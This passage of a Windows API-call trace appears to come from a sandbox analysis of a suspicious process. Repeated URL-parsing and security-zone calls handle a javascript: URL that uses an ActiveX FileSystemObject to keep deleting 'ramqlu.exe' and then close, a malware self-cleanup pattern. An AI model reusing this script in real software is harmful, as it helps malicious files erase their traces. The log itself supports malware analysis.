(This=0x43bfcc) returned 0x4 [0066.606] 
IUnknown:Release (This=0x43bfcc) returned 0x3 [0066.606] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0066.606] IUri:GetPropertyDWORD (in: This=0x43bfcc, uriProp=0x11, pdwProperty=0x2cf3bc, dwFlags=0x0 | out: pdwProperty=0x2cf3bc*=0xf) returned 0x0 [0066.606] IInternetSecurityManager:GetSecurityId (in: This=0x444c48, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pbSecurityId=0x2cf420, pcbSecurityId=0x2cf41c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cf420*=0x6a, pcbSecurityId=0x2cf41c*=0x8f) returned 0x0 [0066.606] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pbSecurityId=0x2cf420, pcbSecurityId=0x2cf41c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cf420*=0x0, pcbSecurityId=0x2cf41c*=0x200) returned 0x800c0011 [0066.607] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cecf8 | out: ppv=0x2cecf8*=0x75028d20) returned 0x0 [0066.607] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cede4 | out: ppvObject=0x2cede4*=0x75028d2c) returned 0x0 [0066.607] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.607] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x451df8, cchResult=0x8c, 
pcchResult=0x2cee2c, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cee2c*=0x8c) returned 0x0 [0066.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x451f18 [0066.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451f18 | out: hHeap=0x410000) returned 1 [0066.607] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.607] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cecf8 | out: ppv=0x2cecf8*=0x75028d20) returned 0x0 [0066.608] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cede4 | out: ppvObject=0x2cede4*=0x75028d2c) returned 0x0 [0066.608] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.608] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x451df8, cchResult=0x8c, pcchResult=0x2cee3c, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cee3c*=0x0) returned 0x800c0011 [0066.608] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.608] IUnknown:Release (This=0x43bfcc) returned 0x4 [0066.608] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f968 | out: hHeap=0x410000) returned 1 [0066.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f) returned 0x451e90 [0066.608] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f9e0 | out: hHeap=0x410000) returned 1 
[0066.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f) returned 0x451f28 [0066.630] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf624 | out: pdwScheme=0x2cf624*=0xf) returned 0x0 [0066.644] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.644] CreateCompatibleBitmap (hdc=0x1b0101ce, cx=1, cy=1) returned 0x405084a [0066.644] GetDIBits (in: hdc=0x1b0101ce, hbm=0x405084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x2cf1a8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x2cf1a8) returned 1 [0066.644] GetDIBits (in: hdc=0x1b0101ce, hbm=0x405084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x2cf1a8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x2cf1a8) returned 1 [0066.644] DeleteObject (ho=0x405084a) returned 1 [0066.644] GetSysColor (nIndex=0) returned 0xc8c8c8 [0066.644] GetSysColor (nIndex=1) returned 0x0 [0066.644] GetSysColor (nIndex=2) returned 0xd1b499 [0066.644] GetSysColor (nIndex=3) returned 0xdbcdbf [0066.645] GetSysColor (nIndex=4) returned 0xf0f0f0 [0066.645] GetSysColor (nIndex=5) returned 0xffffff [0066.645] GetSysColor (nIndex=6) returned 0x646464 [0066.645] GetSysColor (nIndex=7) returned 0x0 [0066.645] GetSysColor (nIndex=8) returned 0x0 [0066.645] GetSysColor (nIndex=9) returned 0x0 [0066.645] GetSysColor (nIndex=10) returned 0xb4b4b4 [0066.645] GetSysColor (nIndex=11) returned 0xfcf7f4 [0066.645] GetSysColor (nIndex=12) returned 0xababab [0066.645] GetSysColor (nIndex=13) returned 0xff9933 [0066.645] GetSysColor (nIndex=14) returned 0xffffff [0066.645] GetSysColor (nIndex=15) returned 0xf0f0f0 [0066.645] GetSysColor (nIndex=16) returned 0xa0a0a0 [0066.645] GetSysColor (nIndex=17) returned 0x6d6d6d [0066.645] GetSysColor (nIndex=18) returned 0x0 [0066.645] GetSysColor (nIndex=19) returned 0x544e43 [0066.645] GetSysColor (nIndex=20) returned 0xffffff [0066.645] GetSysColor (nIndex=21) returned 0x696969 [0066.645] GetSysColor (nIndex=22) returned 0xe3e3e3 [0066.645] GetSysColor (nIndex=23) returned 0x0 [0066.645] GetSysColor (nIndex=24) returned 0xe1ffff 
[0066.645] GetSysColor (nIndex=25) returned 0x0 [0066.645] GetSysColor (nIndex=26) returned 0xcc6600 [0066.645] GetSysColor (nIndex=27) returned 0xead1b9 [0066.645] GetSysColor (nIndex=28) returned 0xf2e4d7 [0066.645] GetSysColor (nIndex=29) returned 0xff9933 [0066.645] GetSysColor (nIndex=30) returned 0xf0f0f0 [0066.645] GetSysColor (nIndex=31) returned 0x0 [0066.645] GetSysColor (nIndex=32) returned 0x0 [0066.645] GetSysColor (nIndex=33) returned 0x0 [0066.645] GetSysColor (nIndex=34) returned 0x0 [0066.645] GetSysColor (nIndex=35) returned 0x0 [0066.646] GetSysColor (nIndex=36) returned 0x0 [0066.646] GetSysColor (nIndex=37) returned 0x0 [0066.646] GetSysColor (nIndex=38) returned 0x0 [0066.646] GetSysColor (nIndex=39) returned 0x0 [0066.646] GetSysColor (nIndex=40) returned 0x0 [0066.646] GetSysColor (nIndex=41) returned 0x0 [0066.646] GetSysColor (nIndex=42) returned 0x0 [0066.646] GetSysColor (nIndex=43) returned 0x0 [0066.646] GetSysColor (nIndex=44) returned 0x0 [0066.646] GetSysColor (nIndex=45) returned 0x0 [0066.646] GetSysColor (nIndex=46) returned 0x0 [0066.646] GetSysColor (nIndex=47) returned 0x0 [0066.646] GetSysColor (nIndex=48) returned 0x0 [0066.646] GetSysColor (nIndex=49) returned 0x0 [0066.646] GetSysColor (nIndex=50) returned 0x0 [0066.646] GetSysColor (nIndex=51) returned 0x0 [0066.646] GetSysColor (nIndex=52) returned 0x0 [0066.646] GetSysColor (nIndex=53) returned 0x0 [0066.646] GetSysColor (nIndex=54) returned 0x0 [0066.646] GetSysColor (nIndex=55) returned 0x0 [0066.646] GetSysColor (nIndex=56) returned 0x0 [0066.646] GetSysColor (nIndex=57) returned 0x0 [0066.646] GetSysColor (nIndex=58) returned 0x0 [0066.646] GetSysColor (nIndex=59) returned 0x0 [0066.646] GetSysColor (nIndex=60) returned 0x0 [0066.646] GetSysColor (nIndex=61) returned 0x0 [0066.646] GetSysColor (nIndex=62) returned 0x0 [0066.646] GetSysColor (nIndex=63) returned 0x0 [0066.646] GetDeviceCaps (hdc=0x1b0101ce, index=38) returned 32409 [0066.646] ReleaseDC (hWnd=0x0, 
hDC=0x1b0101ce) returned 1 [0066.647] GetCurrentThreadId () returned 0x90 [0066.647] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f9e0 [0066.647] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x50) returned 0x44f470 [0066.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d878 [0066.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x42d2a0 [0066.648] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0066.648] GetCurrentThreadId () returned 0x90 [0066.648] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d878 | out: hHeap=0x410000) returned 1 [0066.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x451fc0 [0066.648] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cf5c8 | out: ppu=0x2cf5c8) returned 0x0 [0066.648] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2cf5ac | out: ppURI=0x2cf5ac*=0x43bfcc) returned 0x0 [0066.649] IUnknown:AddRef (This=0x43bfcc) returned 0x6 [0066.649] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pdwZone=0x2cf54c, dwFlags=0x0 | out: pdwZone=0x2cf54c*=0xffffffff) returned 0x800c0011 [0066.649] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cee20 | out: ppv=0x2cee20*=0x75028d20) returned 0x0 [0066.649] 
IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cef0c | out: ppvObject=0x2cef0c*=0x75028d2c) returned 0x0 [0066.650] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.650] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x4520e8, cchResult=0x8c, pcchResult=0x2cef54, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cef54*=0x8c) returned 0x0 [0066.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x452208 [0066.650] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452208 | out: hHeap=0x410000) returned 1 [0066.650] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.650] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cee20 | out: ppv=0x2cee20*=0x75028d20) returned 0x0 [0066.650] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cef0c | out: ppvObject=0x2cef0c*=0x75028d2c) returned 0x0 [0066.650] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.651] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x4520e8, cchResult=0x8c, pcchResult=0x2cef64, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cef64*=0x0) returned 0x800c0011 [0066.651] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.651] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.651] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.651] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.651] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwAction=0x2700, pPolicy=0x2cf550, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2cf550*=0x0) returned 0x0 [0066.651] IUnknown:Release (This=0x43bfcc) returned 0x5 [0066.651] IUnknown:Release (This=0x43bfcc) returned 0x4 [0066.651] IUnknown:AddRef (This=0x43bfcc) returned 0x5 [0066.651] IUri:GetPropertyDWORD (in: This=0x43bfcc, uriProp=0x11, pdwProperty=0x2cf384, dwFlags=0x0 | out: pdwProperty=0x2cf384*=0xf) returned 0x0 [0066.651] IInternetSecurityManager:GetSecurityId (in: This=0x444c48, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pbSecurityId=0x2cf3e0, pcbSecurityId=0x2cf3dc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cf3e0*=0x6a, pcbSecurityId=0x2cf3dc*=0x8f) returned 0x0 [0066.651] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pbSecurityId=0x2cf3e0, pcbSecurityId=0x2cf3dc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cf3e0*=0x0, 
pcbSecurityId=0x2cf3dc*=0x200) returned 0x800c0011 [0066.651] IUnknown:Release (This=0x43bfcc) returned 0x4 [0066.651] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.651] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f) returned 0x4520e8 [0066.652] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x2cf604, dwReserved=0x0 | out: ppIInternetSession=0x2cf604*=0x43f548) returned 0x0 [0066.652] IInternetSession:RegisterNameSpace (This=0x43f548, pCF=0x75028c50, rclsid=0x74c29790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.652] IUnknown:AddRef (This=0x75028c50) returned 0x1 [0066.652] IInternetSession:RegisterNameSpace (This=0x43f548, pCF=0x75028c70, rclsid=0x74c29780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.653] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.653] StrCmpICW (pszStr1="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pszStr2="res://ieframe.dll/PhishSite.htm") returned -8 [0066.653] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf574 | out: ppvObject=0x2cf574*=0x43c254) returned 0x0 [0066.653] IUnknown:Release (This=0x43c254) returned 0x9 [0066.653] IUnknown:AddRef (This=0x43c254) returned 0xa [0066.653] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12c) returned 0x452180 [0066.653] IUnknown:AddRef (This=0x43c254) returned 0xb [0066.653] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf538 | out: ppvObject=0x2cf538*=0x43c254) returned 0x0 [0066.653] IUnknown:Release 
(This=0x43c254) returned 0xb [0066.653] IUnknown:AddRef (This=0x43c254) returned 0xc [0066.653] IUnknown:Release (This=0x43c254) returned 0xb [0066.653] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x3c) returned 0x424338 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb4) returned 0x4522b8 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x42d878 [0066.654] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf5bc | out: pdwScheme=0x2cf5bc*=0xf) returned 0x0 [0066.654] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf5c4 | out: ppvObject=0x2cf5c4*=0x43c254) returned 0x0 [0066.654] IUnknown:Release (This=0x43c254) returned 0xb [0066.654] IUnknown:AddRef (This=0x43c254) returned 0xc [0066.654] IUnknown:Release (This=0x43c254) returned 0xb [0066.654] IUri:IsEqual (in: This=0x43bfcc, pUri=0x43c254, pfEqual=0x2cf604 | out: pfEqual=0x2cf604*=1) returned 0x0 [0066.654] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f4c8 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x452930 [0066.654] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4530f8 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x42d8e8 [0066.655] PostMessageW (hWnd=0x202ae, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12c) returned 0x453160 [0066.655] IUnknown:AddRef (This=0x43c254) returned 0xc [0066.655] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf558 | out: 
ppvObject=0x2cf558*=0x43c254) returned 0x0 [0066.655] IUnknown:Release (This=0x43c254) returned 0xc [0066.655] IUnknown:AddRef (This=0x43c254) returned 0xd [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f520 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x68) returned 0x453298 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x108) returned 0x453308 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f968 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xcc) returned 0x43c680 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x451598 [0066.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d920 [0066.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1b0) returned 0x453418 [0066.656] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf25c | out: ppvObject=0x2cf25c*=0x43c254) returned 0x0 [0066.656] IUnknown:Release (This=0x43c254) returned 0xd [0066.656] IUnknown:AddRef (This=0x43c254) returned 0xe [0066.656] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.656] IUnknown:AddRef (This=0x43c254) returned 0xf [0066.656] IUnknown:AddRef (This=0x43c254) returned 0x10 [0066.656] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf250 | out: ppvObject=0x2cf250*=0x43c254) returned 0x0 [0066.656] IUnknown:Release (This=0x43c254) returned 0x10 [0066.656] IUnknown:AddRef (This=0x43c254) returned 0x11 [0066.656] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x453520 | out: pdwScheme=0x453520*=0xf) returned 0x0 [0066.656] 
IMoniker:IsSystemMoniker (in: This=0x4206a8, pdwMksys=0x2cf2b8 | out: pdwMksys=0x2cf2b8*=0x6) returned 0x0 [0066.745] IUri:GetSchemeName (in: This=0x43c254, pbstrSchemeName=0x2cf210 | out: pbstrSchemeName=0x2cf210*="javascript") returned 0x0 [0066.745] _wcsnicmp (_String1="javas", _String2="data", _MaxCount=0x5) returned 6 [0066.745] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf25c | out: pdwScheme=0x2cf25c*=0xf) returned 0x0 [0066.745] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf21c | out: ppvObject=0x2cf21c*=0x43c254) returned 0x0 [0066.745] IUnknown:Release (This=0x43c254) returned 0x11 [0066.745] IUnknown:AddRef (This=0x43c254) returned 0x12 [0066.745] CoInternetQueryInfo (in: pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", QueryOptions=0xd, dwQueryFlags=0x0, pvBuffer=0x2cf24c, cbBuffer=0x4, pcbBuffer=0x2cf244, dwReserved=0x0 | out: pvBuffer=0x2cf24c*, pcbBuffer=0x2cf244*=0x4) returned 0x0 [0066.746] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf0d4 | out: ppv=0x2cf0d4*=0x75028d20) returned 0x0 [0066.746] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf1c0 | out: ppvObject=0x2cf1c0*=0x75028d2c) returned 0x0 [0066.746] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.749] CoInternetParseUrl (in: pwzUrl="javascript:o=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=0x13, dwFlags=0x0, pszResult=0x2cd180, cchResult=0x1000, pcchResult=0x2cd17c, dwReserved=0x0 | out: pszResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cd17c) returned 0x0 [0066.749] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cd010 | out: ppv=0x2cd010*=0x75028d20) returned 0x0 [0066.749] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cd0fc | out: ppvObject=0x2cd0fc*=0x75028d2c) returned 0x0 [0066.750] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.750] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=19, dwParseFlags=0x0, pwzResult=0x2cd180, cchResult=0x1000, pcchResult=0x2cd17c, dwReserved=0x0 | out: pwzResult="A퇬,䄎盞䆶ꠂ￾￿⋦盔⑆盔Ɯ", pcchResult=0x2cd17c*=0x2cd11c) returned 0x800c0011 [0066.750] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.750] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cd14c | out: ppu=0x2cd14c) returned 0x0 [0066.853] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.853] IUnknown:Release (This=0x43c254) returned 0x11 [0066.853] IUnknown:QueryInterface (in: This=0x43c254, 
